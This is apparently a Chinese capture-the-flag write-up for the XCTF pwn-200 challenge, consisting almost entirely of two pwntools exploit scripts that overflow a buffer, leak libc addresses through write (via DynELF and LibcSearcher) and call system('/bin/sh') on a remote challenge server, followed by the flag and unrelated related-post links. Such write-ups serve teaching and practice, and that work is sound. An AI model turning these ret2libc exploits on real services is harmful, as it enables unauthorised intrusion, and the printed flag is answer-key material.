XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)
pwn-200
- 题目下载地址:
- 查保护
- EXP:
- DynELF解法
- LibcSearcher解法
- flag:
题目下载地址:
点此下载
查保护
只开启了NX
查看是否有后面函数,没有!所以需要利用DynELF泄露system地址获取shell。
这题比较简单,就不写详细解释了,直接上EXP。
EXP:
DynELF解法
# -*- coding: utf-8 -*-
# @Author: 夏了茶糜
# @Date: 2020-03-19 14:01:14
# @email: sxin0807@qq.com
# @Last Modified by: 夏了茶糜
# @Last Modified time: 2020-03-19 15:03:12from pwn import *context(arch="amd64",os="linux")
context.log_level="debug"
p = remote("111.198.29.45",37468)
elf = ELF("./pwn-200")
write_addr = elf.plt["write"]
read_plt = elf.plt["read"]
start = 0x080483D0
bss = elf.bss()
pop_3 = 0x0804856c
def leak(address):p.recvuntil("Welcome to XDCTF2015~!\n")payload = 0x6c * 'a' + 0x4 * 'b' + p32(write_addr) + p32(start) + p32(1) + p32(address) + p32(4)payload = payload.ljust(0x100,"c")p.send(payload)return p.recv(4)
d = DynELF(leak,elf=ELF("./pwn-200"))
sys_addr = d.lookup("system","libc")
log.info("system_addr => %#x", sys_addr)payload = 0x6c * 'a' + 0x4 * 'b' + p32(read_plt) + p32(pop_3) + p32(1) + p32(bss) + p32(8) + p32(sys_addr) + p32(start) + p32(bss)
payload = payload.ljust(0x100,"c")
p.recvuntil("Welcome to XDCTF2015~!\n")
p.send(payload)
p.send("/bin/sh\x00")p.interactive()
p.close()
flag:
cyberpeace{4091636f7e138037bc50802bfe306a0a}
LibcSearcher解法
# -*- coding: utf-8 -*-
# @Author: 夏了茶糜
# @Date: 2020-03-19 15:24:13
# @email: sxin0807@qq.com
# @Last Modified by: 夏了茶糜
# @Last Modified time: 2020-03-19 15:35:56from pwn import *
from LibcSearcher import *context(arch="amd64",os="linux")
context.log_level="debug"
p = remote("111.198.29.45",37468)
elf = ELF("./pwn-200")
write_addr = elf.plt["write"]
read_got = elf.got["read"]
write_got = elf.got["write"]
start = 0x080483D0
bss = elf.bss()
pop_3 = 0x0804856cpayload = 0x6c * 'a' + 0x4 * 'b' + p32(write_addr) + p32(start) + p32(1) + p32(read_got) + p32(4)
payload = payload.ljust(0x100,"c")
p.recvuntil("Welcome to XDCTF2015~!\n")
p.send(payload)
read_addr = u32(p.recv(4))payload = 0x6c * 'a' + 0x4 * 'b' + p32(write_addr) + p32(start) + p32(1) + p32(write_got) + p32(4)
payload = payload.ljust(0x100,"c")
p.recvuntil("Welcome to XDCTF2015~!\n")
p.send(payload)
write_addr = u32(p.recv(4))obj = LibcSearcher("read",read_addr)
obj.add_condition("write",write_addr)libc_base = read_addr - obj.dump("read")
system_addr = obj.dump("system") + libc_base
bin_sh = obj.dump("str_bin_sh") + libc_baselog.info("libc_base => %#x", libc_base)
log.info("system_addr => %#x", system_addr)
log.info("bin_sh => %#x", bin_sh)payload = 0x6c * 'a' + 0x4 * 'b' + p32(system_addr) + p32(start) + p32(bin_sh)
payload = payload.ljust(0x100,"c")
p.recvuntil("Welcome to XDCTF2015~!\n")
p.send(payload)
p.interactive()
p.close()flag:
cyberpeace{4091636f7e138037bc50802bfe306a0a}
XCTF-PWN pwn-200(使用DynELF利用write泄露system地址)相关推荐
- Linux kernel pwn notes(内核漏洞利用学习)
前言 对这段时间学习的 linux 内核中的一些简单的利用技术做一个记录,如有差错,请见谅. 相关的文件 https://gitee.com/hac425/kernel_ctf 相关引用已在文中进行了 ...
- ctfshow pwn——PWN签到题、pwn02
PWN PWN签到题 pwn02 PWN签到题 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwnd ...
- 好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc
前言 本来是在做tcache attack的例题的,但是wiki上的challenge2考察的重点不仅仅是在tcache.题目程序中没有输出的功能,所以无法像往常一样去泄露libc,这个时候就需要进行 ...
- linux添加ip白名单_centOS7 下利用iptables配置IP地址白名单的方法
编辑iptables配置文件,将文件内容更改为如下,则具备了ip地址白名单功能 #vim /etc/sysconfig/iptables *filter :INPUT ACCEPT [0:0] :FO ...
- html 验证邮箱地址,利用javascript验证邮箱地址是否合法
利用javascript验证邮箱地址是否合法 源代码如下: 验证邮箱地址合法性 function EmailAddressTest() { //获取用户输入的邮箱地址相关的信息 var EmailSt ...
- PWN入门(2)利用缓冲区溢出绕过登录和第一个PwnTools脚本
简介 "pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 'p' 与 ...
- 64位c语言调用32位glibc,glibc fclose源代码阅读及伪造_IO_FILE利用fclose实现任意地址执行...
简介 最近学习了一下_IO_FILE的利用,刚好在pwnable.tw上碰到一道相关的题目.拿来做了一下,遇到了一些困难,不过顺利解决了,顺便读了一波相关源码,对_IO_FILE有了更深的理解. 文章 ...
- 黑客攻防技术宝典web实战篇:利用信息泄露习题
猫宁!!! 参考链接:http://www.ituring.com.cn/book/885 随书答案. 1. 当探查 SQL 注入漏洞时,如果请求以下 URL: https://wahh-app.co ...
- 利用函数进行ip地址转换
inet_addr.inet_ntoa.inet_pton.inet_ntop用法 inet_addr(): inet_ntoa(): inet_pton(): inet_ntop(): 运行实例 1 ...
最新文章
- git学习小结(未完待续)
- SQLite 创建数据库(http://www.w3cschool.cc/sqlite/sqlite-create-database.html)
- leetcode 287. Find the Duplicate Number | 287. 寻找重复数(判断链表是否有环,并找到环的起点)
- 如何处理CloudFoundry应用部署时遇到的254错误
- 阿里的26款大神级的Java开源项目
- Libevent初探
- 【转载】shell实例手册
- At present, Huawei has two more important
- java 同步与异步区别_同步和异步有何异同,在什么情况下分别使用它们?
- weblogic启动项目失败查看_weblogic启动报错常见错误解决办法
- 嵌入式硬件入门——蜂鸣器
- 浅谈腾讯云IM接入方式(java后端)
- 蓝桥杯学习笔记十:PWM占空比测量实验
- 大数据:对大数据的理解
- 2017年深圳积分入户分值表(精简版)
- xynu 2139: 德莱联盟(判断线段是否相交 )
- 微信内置浏览器调试和调试微信内的H5页面汇总(持续更新...)
- linux蓝牙适配器驱动安装失败,deepin官方论坛-深度科技官网旗下网站
- OneNote如何修改已有的笔记本为默认的快速笔记?
- firewalld火墙策略(一)